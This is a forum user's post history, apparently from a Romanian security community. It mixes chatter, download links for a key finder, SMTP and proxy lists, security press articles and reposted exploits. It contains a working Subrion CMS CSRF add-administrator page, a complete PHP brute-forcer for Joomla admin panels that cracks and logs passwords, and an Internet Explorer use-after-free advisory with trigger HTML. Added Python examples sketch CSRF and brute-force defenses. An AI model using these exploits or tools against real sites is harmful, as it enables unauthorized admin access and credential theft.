Everything posted by bc-vnt
-
So I'm not the only one; since this morning the same problem has been showing up for me too, but on 2-3 topics. If it shows up again I'll take a screenshot as well. EDIT :
-
Acer Notebook Aspire 5750G-2354G64, Core i3 2.30 GHz processor, 64-bit, 4 GB RAM: Amazon.it: Electronics
-
Download : Win Key Finder.exe download - 2shared Scann : Description : Find your key Windows Sorry for the title, my " R " key got stuck. If an admin wants to edit it
-
Enjoy : Whitepapers - www.technicalinfo.net
-
Dj " and the DJs' initials
-
Download : SMTP servers.rar download - 2shared pass RC4 : FdlDLiydKb pass ATOM128 : LlcaLIBaKWCC
-
Download no pass : Proxy's list.rar download - 2shared And here are some special proxies : Dangerous IP ranges!!!.rar download - 2shared pass SHA1 hash : a32e3b3b6857d671fefefc7cfb8349d22a7fc695 pass XOR : 0fa016ef920258052f0fae pass BASE64 : MmHfMsZfLQ// Another small list : http://www.2shared.com/document/vbadhlEX/Proxy_list.html
-
Closing registrations is not such a good idea, but the idea of a " zone " for newcomers is ok ! One idea would be that after a certain number of posts they could move on to the rest of the forum , JUST AN IDEA .
-
Adobe Illustrator CS6 v16.0.0 LS4 Western Europe Multi
bc-vnt replied to io.kent's topic in Programare
File not found, reUP
-
AV-Comparatives' testing of more than 18,000 dangerous Android applications places Bitdefender Mobile Security in the top product category, both for protection against Android viruses and for its impact on the phone's battery, according to tests carried out by the independent analysis organization AV-Comparatives.

Testing carried out by AV-Comparatives on 13 security software products for Android showed that Bitdefender Mobile Security ranks in the top product category for virus protection. BMS identified between 98 and 100% of Android viruses, out of more than 18,000 dangerous applications.

Bitdefender Mobile Security also proved to be a top solution in detecting a large number of adware families. This is an important quality for antivirus software, since some applications that integrate advertising content bother users with messages without the users being able to tell which of the applications they use is responsible for that content. In addition, the software did not raise any false alarm during testing.

In the AV-Comparatives evaluation, the independent organization's specialists listed among its strengths the very intuitive web interface that allows control of multiple devices, the wide range of SMS commands, and the features of the Anti-Theft module.

"Bitdefender has a long history in high-performance antivirus products for computers, and we are glad to see that the company's experience has been carried over to the mobile field. Bitdefender shows remarkable consistency across the product range we test," says Andreas Clementi, CEO of AV-Comparatives.

http://www.securitateit.ro/2012/09/studiu-privind-aplicatii-securitate-mobile/
-
Companies need an accurate assessment of the security of their IT systems in order to operate efficiently. Organizations should turn to a solution that is increasingly important and necessary nowadays: the IT audit. Its purpose is to determine what vulnerabilities an information system has, so that they can be eliminated with the right solutions.

Technical audits for online applications can include elements such as application security, application architecture and code quality, as well as elements related to attracting customers to an online platform: loading speed, search engine impact or usability.

"Unfortunately, an IT audit takes place very rarely in Romania, especially in the online applications sector. There are also numerous cases in which the buyer of an online business does not actually know what they have acquired, because they neglect to carry out such an audit. That is why I recommend that a maximum of 5% of a company's development budget be allocated to contracting a new firm to provide this type of service. Only in this way can you make sure that the services delivered are of good quality and that you will not have to pay even more in the future, after the warranty period ends," says Alexandru Lăpușan, CEO & Founding Partner of Zitec, one of the main local producers of online applications.

Zitec's specialists have put together a top 10 of the most widespread vulnerabilities and frequent mistakes found in the audits carried out over the last 12 months:

1. Passwords and other confidential data stored unprotected. Certain confidential data within a company can end up being stored without any protection at all or with insufficient protection methods.

2. Public files. In some situations there are files with important data that can be accessed very easily from the internet, which makes them practically public. Whether this is due to negligence or to a security oversight, these files may contain sensitive data or useful information that can become the target of attacks.

3. Outdated software versions. Outdated software versions are used in production, with known critical security problems that were fixed in later versions. Known security problems can be exploited very easily even by people without advanced technical knowledge, and there are even applications specialized in exploiting these security holes.

4. Disclosure of technical details. There are cases in which an application discloses sensitive technical details when one of its components fails, with confidential information being made public through the error messages displayed.

5. Lack of server-side data validation. Another vulnerability of an information system, found regularly by Zitec's specialists in the audits they carry out, is that validation of the data entered by a user is done only in the interface displayed by the browser, and not at the server level. This exposes the application to several types of attacks.

6. The connection to the database is made with a user that has permissions far beyond the application's needs. Once the access credentials are compromised, the attacker can easily gain access to all the databases, which may also hold information belonging to the company's other applications.

7. Confidential data is not transmitted over a secure protocol. Sometimes only a few pages are secured (login, register, checkout etc.) and not the whole site, which makes session/identity theft as easy as on a site not protected by a security certificate.

8. Services that can be attack vectors. The production server has unused services running, which in turn have open ports. These services are possible attack vectors (especially since, being unused, they are usually not updated to the latest versions).

9. The application's configuration files are stored in public directories. The risk that configuration data, sometimes including access passwords or other sensitive data, is accessed by unauthorized personnel increases greatly in this case.

10. Vulnerabilities to Denial of Service attacks. One example would be setting a per-connection memory limit of 10% (sometimes considerably more) of the server's available memory. Thus, 10 concurrent users can consume the server's entire memory.

The fact that the specialists behind an application know about these problems does not guarantee that they will always take them into account in the solutions they produce. That is why an audit of this kind does not necessarily check the quality of the development team, but rather the quality of the development processes used. These audits also help the client (even one from within the same company) make sure that they will not be the one paying in the future for a possible lack of quality in the product.

"For example, we carry out periodic internal audits, along with training sessions for developers, because it is much easier to find problems in a system than to build it to be 100% secure," Lăpușan added.

http://www.securitateit.ro/2012/09/top-10-vulnerabilitati-computere/
-
They've got brains , wtf man , this is why those who have gone abroad , the honest ones , are marginalized and put in the same " pot " with people like this .
-
Subrion CMS version 2.2.1 suffers from a cross site request forgery vulnerability.

<!--

Title: Subrion CMS 2.2.1 CSRF Add Admin Exploit

Vendor: Intelliants LLC
Product web page: http://www.subrion.com
Affected version: 2.2.1

Summary: Subrion is a free open source content management system. It's
written in PHP 5 and utilizes MySQL database. Subrion CMS can be easily
integrated into your current website or used as a stand alone platform.
It's extremely flexible and scalable php system that stands for a content
management framework.

Desc: The application allows users to perform certain actions via HTTP
requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.

- Usergroup 1 - Administrator
- Usergroup 2 - Moderator
- Usergroup 8 - Registered

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
           PHP 5.4.4
           MySQL 5.5.25a

Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience

Vendor status:

[05.09.2012] Vulnerability discovered.
[06.09.2012] Contact with the vendor.
[07.09.2012] Vendor responds asking more details.
[07.09.2012] Sent detailed information to the vendor.
[10.09.2012] Vendor creates patch.
[11.09.2012] Vendor releases version 2.2.2 to address this issue.
[11.09.2012] Coordinated public security advisory released.

Advisory ID: ZSL-2012-5106
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5106.php

05.09.2012

-->

<html>
<head>
<title>Subrion CMS 2.2.1 CSRF Add Admin Exploit</title>
</head>
<body><center><br />
<form method="post" action="http://localhost/subrion/admin/accounts/add/" onsubmit="forge()">
<input type="hidden" name="username" value="Commando" />
<input type="hidden" name="fullname" value="Arnold Schwarzenegger" />
<input type="hidden" name="email" value="lab@zeroscience.mk" />
<input type="hidden" name="_password" value="l33tP4ss!" />
<input type="hidden" name="_password2" value="l33tP4ss!" />
<input type="hidden" name="usergroup" value="1" />
<input type="hidden" name="avatar" value="" />
<input type="hidden" name="sponsored" value="0" />
<input type="hidden" name="plan_id" value="1" />
<input type="hidden" name="sponsored_end" value="" />
<input type="hidden" name="status" value="active" />
<input type="hidden" name="save" value="Add" />
<input type="hidden" name="goto" value="list" />
<input type="hidden" name="old_name" value="ZSL" />
<input type="hidden" name="id" value="" />
<input type="submit" id="exploit" value="Forge!" />
</form></center>
<script type="text/javascript">
function forge(){document.getElementById("exploit").click();}
</script>
</body>
</html>

http://packetstormsecurity.org/files/116433/Subrion-CMS-2.2.1-Cross-Site-Request-Forgery.html
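
A server-side check that would reject the forged POST from the advisory above, as an added example that is not part of the original post or of Subrion's code. It is written in framework-neutral Python rather than Subrion's PHP; the request dictionary shape, `SERVER_KEY`, `TRUSTED_ORIGINS`, the `csrf_token` field name and the sample requests are assumptions constructed for illustration.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Assumptions: a per-deployment secret and the origin the admin panel is
# served from (the PoC above posts to http://localhost/subrion/...).
SERVER_KEY = secrets.token_bytes(32)
TRUSTED_ORIGINS = {"http://localhost"}
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


def issue_token(session_id):
    """Anti-CSRF token bound to one session: HMAC-SHA256(server key, session id)."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def origin_of(url):
    """Reduce an Origin or Referer header value to scheme://host[:port]."""
    parts = urlsplit(url or "")
    if not parts.scheme or not parts.netloc:
        return None
    return f"{parts.scheme}://{parts.netloc}".lower()


def check_state_change(request):
    """Return (allowed, reason) for a request dict with the hypothetical keys
    method, headers, session_id and form."""
    if request["method"] in SAFE_METHODS:
        return True, "safe method"
    headers = request.get("headers", {})
    # Check 1: the request must come from a page on our own origin.
    source = origin_of(headers.get("Origin")) or origin_of(headers.get("Referer"))
    if source is None:
        return False, "no Origin or Referer on a state-changing request"
    if source not in TRUSTED_ORIGINS:
        return False, "origin not trusted"
    # Check 2: the form must carry the token issued to this session. A page on
    # another site cannot read it, so it cannot place it in a forged form.
    supplied = request.get("form", {}).get("csrf_token", "")
    expected = issue_token(request["session_id"])
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return False, "missing or invalid CSRF token"
    return True, "ok"


# --- Constructed sample requests ------------------------------------------
ADMIN_SESSION = "constructed-admin-session-id"
ADD_ACCOUNT = {"username": "Commando", "usergroup": "1", "status": "active", "save": "Add"}

# What the PoC page produces: the browser attaches the admin's session cookie,
# but the form comes from another origin and carries no token.
FORGED = {
    "method": "POST",
    "path": "/subrion/admin/accounts/add/",
    "headers": {"Origin": "http://attacker.example"},
    "session_id": ADMIN_SESSION,
    "form": dict(ADD_ACCOUNT),
}

# Same fields, same origin, still no token (for example an old cached form).
SAME_ORIGIN_NO_TOKEN = dict(FORGED, headers={"Origin": "http://localhost"})

# The admin's own form, rendered by the application with the session's token.
LEGIT = {
    "method": "POST",
    "path": "/subrion/admin/accounts/add/",
    "headers": {"Origin": "http://localhost"},
    "session_id": ADMIN_SESSION,
    "form": dict(ADD_ACCOUNT, csrf_token=issue_token(ADMIN_SESSION)),
}


def demo():
    """Run all constructed requests through the check."""
    samples = {"forged": FORGED, "no_token": SAME_ORIGIN_NO_TOKEN, "legit": LEGIT}
    return {name: check_state_change(req) for name, req in samples.items()}


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(name, verdict)
```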
-
This is a php script that takes a list of sites and password possibilities and runs as a cracker against Joomla administrative panels.

<?php
set_time_limit(0);
/*
 * Joomla Brute Forcer
 * Coded by miyachung
 * miyachung@hotmail.com
 * Janissaries.Org
 * Special Thanks burtay
 * Usage-> php Bruter.php SITELIST PASSWORDS
 * Example-> php Bruter.php SITES.txt PASSWORDS.txt
 */
class jom
{
    public $sites;
    public $wordlist;
    private $user = "admin";
    private $regex = "/([0-9a-f]{32})/si";
    private $timeout = 7;
    private $cookie_file = "cookie.jani";
    private $log_file = "cracks.txt";

    private function save_File($content)
    {
        $fp = fopen($this->log_file,'ab');
        fwrite($fp,$content);
        fclose($fp);
        if($fp)
        {
            return true;
        }
        else
        {
            return false;
        }
    }

    private function get_Hash($site)
    {
        $curl = curl_init();
        curl_setopt($curl,CURLOPT_RETURNTRANSFER,TRUE);
        curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
        curl_setopt($curl,CURLOPT_COOKIEJAR,$this->cookie_file);
        curl_setopt($curl,CURLOPT_TIMEOUT,$this->timeout);
        $play = curl_exec($curl);
        curl_close($curl);
        if(preg_match('#value="com_login"#si',$play))
        {
            preg_match($this->regex,$play,$hash);
            return $hash[1];
        }
        else
        {
            echo "[-]Hash not found,passing site\n";
            return false;
        }
    }

    private function tryPassword($site,$password,$hash)
    {
        $curl = curl_init();
        curl_setopt($curl,CURLOPT_RETURNTRANSFER,TRUE);
        curl_setopt($curl,CURLOPT_POST,TRUE);
        curl_setopt($curl,CURLOPT_FOLLOWLOCATION,TRUE);
        curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
        curl_setopt($curl,CURLOPT_COOKIEFILE,$this->cookie_file);
        curl_setopt($curl,CURLOPT_TIMEOUT,$this->timeout);
        curl_setopt($curl,CURLOPT_POSTFIELDS,"username=".$this->user."&passwd=".$password."?=&option=com_login&task=login&".$hash."=1");
        $play = curl_exec($curl);
        curl_close($curl);
        return $play;
    }

    public function bruter()
    {
        $sites = explode("\n",file_get_contents($this->sites));
        foreach($sites as $site)
        {
            if(!preg_match('#http#si',$site)) $site = "http://".$site;
            $site = trim($site);
            echo "\n[+]$site\n";
            $hash = $this->get_Hash($site);
            if(!$hash){continue;}
            echo "[+]$hash\n";
            $wordlist = explode("\n",file_get_contents($this->wordlist));
            foreach($wordlist as $password)
            {
                $try = $this->tryPassword($site,trim($password),$hash);
                if(preg_match("/com_config/si",$try))
                {
                    echo "\n\t[*]Password cracked-> ".$password."\n";
                    echo "\t[*]Saved to the log file\n";
                    $this->save_File("$site|$password\r\n");
                    break;
                }
            }
        }
    }
}

if(!$argv[1] || !$argv[2])
{
    echo "################################################\n";
    echo "\t\tJoomla Brute Forcer\n";
    echo "\t\tCoded By miyachung\n";
    echo "\t\tJanissaries.Org\n";
    echo "################################################\n";
    echo "\n[-]Missing arguments\n";
    exit;
}
elseif(!file_exists($argv[1]) OR !file_exists($argv[2]))
{
    echo "################################################\n";
    echo "\t\tJoomla Brute Forcer\n";
    echo "\t\tCoded By miyachung\n";
    echo "\t\tJanissaries.Org\n";
    echo "################################################\n";
    echo "\n[-]File not found\n";
    exit;
}
else
{
    echo "################################################\n";
    echo "\t\tJoomla Brute Forcer\n";
    echo "\t\tCoded By miyachung\n";
    echo "\t\tJanissaries.Org\n";
    echo "################################################\n";
    $jom = new jom;
    $jom->sites = $argv[1];
    $jom->wordlist = $argv[2];
    $jom->bruter();
}
?>

http://packetstormsecurity.org/files/115088/Joomla-Admin-Panel-Bruteforcer.html
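
Seen from the defender's side, the script above produces one GET followed by a burst of POSTs to /administrator/index.php from a single client, and because it sets no CURLOPT_USERAGENT those requests normally arrive without a User-Agent. The detector below is an added example, not part of the original post; the combined access-log format, the thresholds and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOGIN_PATH = "/administrator/index.php"

# Common/combined log format; referer and user agent are optional.
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?'
)


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["path"] = rec["path"].split("?", 1)[0]  # ignore the query string
    return rec


def find_bruteforce(lines, max_posts=5, window=timedelta(seconds=60)):
    """Flag clients that send more than max_posts login POSTs within window.

    Lines are assumed to be in chronological order, as in a live access log.
    Returns {ip: {"first_seen": datetime, "peak": int, "empty_agent": bool}}.
    """
    recent = defaultdict(deque)  # ip -> timestamps of recent login POSTs
    alerts = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["path"] != LOGIN_PATH:
            continue
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        while q and rec["ts"] - q[0] > window:  # slide the window forward
            q.popleft()
        if len(q) > max_posts:
            alert = alerts.setdefault(
                rec["ip"], {"first_seen": q[0], "peak": 0, "empty_agent": False}
            )
            alert["peak"] = max(alert["peak"], len(q))
            # Secondary signal: no User-Agent, as sent by a bare cURL client.
            alert["empty_agent"] |= rec["agent"] in (None, "", "-")
    return alerts


# --- Constructed sample log (documentation IP ranges, invented values) ------
SAMPLE_LOG = (
    ['203.0.113.7 - - [12/Sep/2012:10:00:00 +0000] '
     '"GET /administrator/index.php HTTP/1.1" 200 5120 "-" "-"']
    + [f'203.0.113.7 - - [12/Sep/2012:10:00:{s:02d} +0000] '
       f'"POST /administrator/index.php HTTP/1.1" 303 0 "-" "-"'
       for s in range(1, 9)]
    + ['198.51.100.20 - - [12/Sep/2012:10:00:03 +0000] '
       '"POST /administrator/index.php HTTP/1.1" 303 0 '
       '"http://site.example/administrator/" "Mozilla/5.0"',
       '198.51.100.20 - - [12/Sep/2012:10:00:40 +0000] '
       '"POST /administrator/index.php HTTP/1.1" 303 0 '
       '"http://site.example/administrator/" "Mozilla/5.0"']
)

if __name__ == "__main__":
    for ip, info in find_bruteforce(SAMPLE_LOG).items():
        print(ip, info)
```

The same counter can drive a lockout or rate limit on the login endpoint instead of an alert; the threshold and window should be tuned to the site's real administrator traffic.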
-
The vulnerability described in this document can be exploited by a malicious Web page to execute arbitrary code with low integrity. Active scripting must be enabled, and the present exploitation techniques require that font downloading be set to "Enable" or "Prompt" and that the "mailto:" protocol be present. (These requirements are satisfied by default on Windows XP, Windows Vista, and Windows 7.) The user is presented with a message box which must be dismissed before code execution can occur.

Internet Explorer Script Interjection Code Execution

Derek Soeder
ds.adv.pub@gmail.com

Reported: January 26, 2012, to SecuriTeam Secure Disclosure
          http://www.beyondsecurity.com/ssd.html
Published: August 16, 2012 (updated September 6, 2012)

AFFECTED VENDOR
---------------
Microsoft Corporation

AFFECTED ENVIRONMENTS
---------------------
Internet Explorer 7.0 on Windows XP and Windows Vista
Internet Explorer 8.0 on Windows XP, Windows Vista, and Windows 7
Internet Explorer 9.0.0 through 9.0.8 (MS12-044) on Windows Vista and Windows 7

Other versions of Internet Explorer have not been tested.

UNAFFECTED ENVIRONMENTS
-----------------------
Internet Explorer with MS12-052 hotfix applied

IMPACT
------
The vulnerability described in this document can be exploited by a malicious Web page to execute arbitrary code with low integrity. Active scripting must be enabled, and the present exploitation techniques require that font downloading be set to "Enable" or "Prompt" and that the "mailto:" protocol be present. (These requirements are satisfied by default on Windows XP, Windows Vista, and Windows 7.) The user is presented with a message box which must be dismissed before code execution can occur.

VULNERABILITY DETAILS
---------------------
Processing of events in Internet Explorer is typically driven by window messages originating both externally (for instance, due to user input or paint requests) and internally. As with all window messages, these messages are retrieved from the current thread's message queue by a message loop, which dispatches each message to a window procedure. The window procedure, in turn, invokes code to handle the associated event based on the type of window message.

If the event handling code can be made to display a message box or dialog, or otherwise enter a message loop, then another window message relating to a separate, second event may be dispatched during this "stacked," second message loop, meaning the second event will be processed before the original event has been fully handled. Processing of the original event continues only after the second message loop has ended (i.e., when the displayed message box or dialog closes).

If the second event handling code can cause the program's state to become inconsistent with the first event handling code's expectations--for instance, by destroying objects referenced in variables local to the first event handling code--then it should be possible to cause memory corruption which can be exploited to achieve arbitrary code execution.

A variety of events can result in script running during the event handler code. Although it's simple for script to display a message box or dialog and thereby enter a message loop (e.g., using window.alert, window.prompt, or window.clipboardData.getData under default security settings), so far it does not appear that an interrupting, second event handler can then do anything to disrupt program state in a way that the first event handler will not accommodate. This is understandable, since script must be able to handle other script running at any time and having arbitrary effects on program state. Objects accessible to script should be properly reference-counted and garbage-collected, and any exception would constitute a separate vulnerability that could likely be exploited without use of the flaw described in this document.

In some cases, it's also possible to make MSHTML.DLL enter a message loop while handling a page rendering event (as opposed to an event intended to run script). For one, MSHTML!CMarkup::ProcessURLAction* is used to check a variety of security settings during page downloading and rendering; this function calls URLMON!ProcessUrlAction*, which may display a dialog if the queried setting's action is set to "Prompt". Unfortunately, most of the security settings which default to prompting are now handled through the yellow security band or notification bar rather than a dialog. Other avenues for reaching a message loop may be discovered by backtracking from functions such as DispatchMessageW, MessageBoxW, and DialogBoxParamW.

One function call of particular interest is a call to MessageBoxW found in MSHTML!CMailtoProtocol::DisplayMailClientNotFoundError. It was discovered that, if Internet Explorer attempts to download a very long (approximately 2,030-character) "mailto:" URL, then CMailtoProtocol::RunMailClient will fail and call CMailtoProtocol::DisplayMailClientNotFoundError to display a message box, thereby entering a message loop. (The message reads, "Could not perform this operation because the default mail client is not properly installed.") Furthermore, it was found that displaying this message box while downloading an embedded font (by specifying a long "mailto:" URL for the font's "src" property) will result in references to targetable objects remaining on the stack until the message box is closed.

Thus, a Web page can exploit this vulnerability by declaring an embedded font with a long "mailto:" source URL and ensuring that an event which destroys and replaces targetable objects occurs while the message box is open. Although the particulars of the targetable objects are Internet Explorer version-dependent, exploitation should generally proceed as typical for an Internet Explorer use-after-free vulnerability.

Events

The most significant complexity of this vulnerability is understanding Internet Explorer's event handling. As mentioned above, event handling is based on the processing of window messages. Some window messages may arise from user input (such as keyboard and mouse messages), while others may be generated by the operating system (such as paint and resize messages), but most messages signaling events are generated internally by Internet Explorer. These messages use a message identifier value of 0x8002 and are generated when a "method call" is added to a queue maintained in Thread Local Storage (TLS), if the queue is empty. A method call is simply a function pointer and associated data representing a callback to be invoked by the event handling message loop (or any other message loop). Method calls are queued using MSHTML!_GWPostMethodCallEx and handled by MSHTML!GlobalWndOnMethodCall, which the MSHTML!GlobalWndProc window procedure calls in response to a message 0x8002.

It is important to note that a message 0x8002 will only be posted if the method call queue is empty and if a message 0x8002 is not outstanding (being processed or waiting to be processed). Therefore, with possibly one minor exception, a second message 0x8002 cannot be pending while a first message 0x8002 is being processed, meaning a second method call-based event cannot be handled while a first method call-based event is being handled, even if the first enters a message loop. When exploiting the vulnerability, one event may be based on a method call, but the other must correspond to user input or some other type of message.

Although designing a Web page to provoke a user input message without user interaction is not difficult, Internet Explorer 9 offers another possibility by introducing asynchronous events. If a Web page is viewed in IE9 standards mode, certain events (for example, body.onfocus) will instead be mediated by messages with an identifier value of 0x8003, which are generated via MSHTML!CEventMgr::QueueAsyncEvent -> MSHTML!CAsyncEventQueue::QueueEvent and processed when GlobalWndProc calls MSHTML!CAsyncEventQueue::DispatchAllEvents. If the asynchronous event handling code enters a message loop, a message 0x8002 could then be dispatched and cause any queued method calls to be processed.

Example (Internet Explorer 7 and 8)

A simple example of how to reproduce this vulnerability in Internet Explorer versions 7 and 8 follows. A Web page contains an empty style sheet link, a body with an "onmouseover" event handler, and a script element which creates a new script element and assigns it an "onreadystatechange" event handler. The body also has a style which specifies a large height value, so that the body area will occupy the full height as well as width of the browser window. The following HTML illustrates:

    <html>
    <head>
    <script>
    var s = document.createElement("script");
    s.src = "slow.js";
    s.onreadystatechange = function()
    {
        if (this.readyState == "loaded")
        {
            document.styleSheets[0].cssText = null;
        }
    };
    var o = document.getElementsByTagName("script")[0];
    o.parentNode.insertBefore(s, o);
    </script>
    <link rel="stylesheet" href=""></link>
    </head>
    <body style="height: 9999px;" onmouseover="document.styleSheets[0].href = 'MyFont.css';">
    </body>
    </html>

The response to the request for "slow.js" can return anything--or nothing--as long as it takes longer to complete than does the request for "MyFont.css". The goal is to have the new script element's "onreadystatechange" event handler run after the style sheet has loaded. "MyFont.css" consists of the following CSS:

    @font-face
    {
        font-family: "MyFont";
        src: url(mailto:xxx<... approximately 2,020 characters removed ...>xxx);
    }

When the Web page loads, the presence of the mouse cursor over the window causes MSHTML!CServer::WndProc to receive a mouse window message, which it passes to MSHTML!CDoc::OnWindowMessage -> MSHTML!CDoc::OnMouseMessage. Further up the call stack, the script of the body's "onmouseover" event handler runs, setting the empty style sheet link's "href" attribute to load "MyFont.css". When the CSS defining the "MyFont" embedded font is parsed, the long "mailto:" URL will ultimately result in CMailtoProtocol::DisplayMailClientNotFoundError displaying an error message box, pausing execution of that thread except to process window messages. Using the "onmouseover" event handler for this purpose ensures that the message box will appear during processing of a user input window message, rather than during processing of a method call (0x8002) window message, which leaves the method call avenue available for the second event.

While the message box is showing, our attack server completes its intentionally delayed response to the request for "slow.js", causing the client to queue a method call which will run the new script element's "onreadystatechange" event handler. Because a method call (message 0x8002) is not currently being processed--the event being processed originated instead as a mouse window message--this means the thread responsible for downloading "slow.js" is free to post a message 0x8002 after it queues the method call. The window message will then be dispatched by the message loop that drives the error message box, causing the "onreadystatechange" event handler to run.

In this example, the event handler tampers with the object representing the style sheet, which was still being interpreted at the time the message box was displayed. The tampering provokes a crash once the message box closes and interpretation of the style sheet is allowed to continue.

Example (Internet Explorer 9)

Now a simple example specific to Internet Explorer 9 is presented. A Web page contains a body with an "onfocus" event handler, a style sheet defining an embedded font and a class which uses it, a "div" element of the defined class, and a script element which creates a new script element and assigns it an "onreadystatechange" event handler. The document begins with a "DOCTYPE" declaration which ensures that the page will be rendered in IE9 standards mode. The following HTML illustrates:

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
    <html>
    <head>
    <style>
    @font-face
    {
        font-family: "MyFont";
        src: url(mailto:xxx<... approximately 2,020 characters removed ...>xxx);
    }
    .MyFontClass
    {
        font-family: "MyFont";
    }
    </style>
    <script>
    var s = document.createElement("script");
    s.src = "slow.js";
    s.onreadystatechange = function()
    {
        if (this.readyState == "loaded")
        {
            var d = document.getElementById("MyDiv");
            d.parentNode.removeChild(d);
        }
    };
    document.appendChild(s);
    </script>
    </head>
    <body onfocus="document.getElementById('MyDiv').className = 'MyFontClass';">
    <div id="MyDiv"></div>
    </body>
    </html>

In IE9 standards mode, embedded fonts are not downloaded until they're needed to render the page, meaning that the embedded font's long "mailto:" URL is interpreted--and therefore the error message box is displayed--when the body's "onfocus" event fires. Because body.onfocus is handled in IE9 standards mode as an asynchronous event (message 0x8003), method calls (message 0x8002) remain free to be dispatched while the message box message loop is on the call stack.

In this example, we expect "slow.js" to finish downloading after body.onfocus fires and causes the error message box to appear. The code in IE that manages the download will queue an "onreadystatechange" method call for the script, which will be dispatched by the message box message loop, allowing our Javascript to execute.
Since IE9 accesses embedded fonts on demand, there will be references to various objects on the stack below the message box message loop, so if our Javascript tampers with these objects, a crash will result once the message box is closed.

Walkthrough

To help provide a visual understanding of the vulnerability, a chronological walkthrough of the Internet Explorer 9 example crash is presented here. Following along in the example is recommended. The symbols shown correspond to Internet Explorer 9.0.3 on Windows 7 SP1 x86, with MSHTML.DLL version 9.0.8112.16437 loaded at 6D1C0000 and page heap enabled.

When the example page is loading, a 0x54-byte CTreePos class instance is allocated on the heap: (This CTreePos instance will be freed and its memory reused later.)

    77365ae0 ntdll!RtlAllocateHeap+0x0000023a
    6d423fe1 MSHTML!CHtmRootParseCtx::BeginElement+0x00000035
    6d51b14b MSHTML!CHtmTextParseCtx::BeginElement+0x000000a1
    6d4245a0 MSHTML!CHtmParse::BeginElement+0x00000151
    6d4269aa MSHTML!CHtmParse::ParseBeginTag+0x00000199
    6d422422 MSHTML!CHtmParse::ParseToken+0x00000100
    6d42292a MSHTML!CHtmPost::Exec+0x00000233
    6d427a10 MSHTML!CHtmPost::Run+0x00000041
    6d42793c MSHTML!PostManExecute+0x000001a3
    6d4278a1 MSHTML!PostManResume+0x000000dd
    6d427801 MSHTML!CHtmPost::OnDwnChanCallback+0x00000010
    6d40b4d5 MSHTML!CDwnChan::OnMethodCall+0x0000001f
    6d5a9d09 MSHTML!GlobalWndOnMethodCall+0x00000115
    6d5c9368 MSHTML!GlobalWndProc+0x00000302
    7748c4e7 USER32!InternalCallWinProc+0x00000023
    7748c5e7 USER32!UserCallWinProcCheckWow+0x0000014b
    7748cc19 USER32!DispatchMessageWorker+0x0000035e
    7748cc70 USER32!DispatchMessageW+0x0000000f
    6e8e1b44 IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000722
    6e901a16 IEFRAME!LCIETab_ThreadProc+0x00000317
    759315b0 iertutil!CIsoScope::RegisterThread+0x000000ab
    6e8efd5b IEFRAME!Detour_DefWindowProcA+0x0000006c
    75c4ed6c kernel32!BaseThreadInitThunk+0x0000000e
    773737f5 ntdll!__RtlUserThreadStart+0x00000070
    773737c8 ntdll!_RtlUserThreadStart+0x0000001b

Next, the page's Javascript executes, creating a new script element with a source of "slow.js". The idea is that the Web server will intentionally postpone serving this file for a second or two. This arranges for an "onreadystatechange" event to fire after the delay elapses.

Once the page finishes loading (but before the delay has elapsed), the "body.onfocus" event fires. Because the document is in IE9 standards mode, "body.onfocus" will be queued as an asynchronous event, meaning it will be mediated by window message 0x8003.

The "body.onfocus" event handler changes a "div" element's class to a class that uses an embedded font. This forces Internet Explorer to attempt to download the font, which fails due to the long "mailto:" URL. Crucially, the failure triggers a "mailto"-specific message box to be displayed; this enters a new, top message loop during the original, bottom message loop's handling of the 0x8003 window message associated with the "body.onfocus" event. The call stack, from top to bottom, now looks like this:

    774a382a USER32!NtUserWaitMessage+0xc
    774a3b27 USER32!DialogBox2+0x207
    774ce0d5 USER32!InternalDialogBox+0xcb
    774ce659 USER32!SoftModalMessageBox+0x68a
    774ce78c USER32!MessageBoxWorker+0x2ca
    774cea08 USER32!MessageBoxTimeoutW+0x7f
    6ea15e86 USER32!MessageBoxExW+0x1b
    774ceaa4 IEFRAME!Detour_MessageBoxExW+0x47
    6db3ac94 USER32!MessageBoxW+0x45
    6db3aaf1 MSHTML!CMailtoProtocol::DisplayMailClientNotFoundError+0x10b
    6db3a2cc MSHTML!CMailtoProtocol::RunMailClient+0x12e
    6db39def MSHTML!CMailtoProtocol::ParseAndBind+0x8b
    76ab1c0b MSHTML!CMailtoProtocol::Start+0xcd
    76a98fb3 URLMON!COInetProt::StartEx+0xf0
    76a9a31f URLMON!CTransaction::StartEx+0x40b
    76a8386c URLMON!CBinding::StartBinding+0x883
    6d438507 URLMON!operator new+0x20
    6d4383ed MSHTML!CTridentFilterHost::BindToMoniker+0xe4
    6d4216f3 MSHTML!CDwnBindData::Bind+0x722
    6d42153b MSHTML!NewDwnBindData+0x189
    6d20c107 MSHTML!CDwnLoad::Init+0x25c
    6d5c1f27 MSHTML!CBitsLoad::Init+0x52
    6d421279 MSHTML!CDwnInfo::SetLoad+0x11e
    6d451257 MSHTML!CDwnInfo::AddDwnCtx+0x67
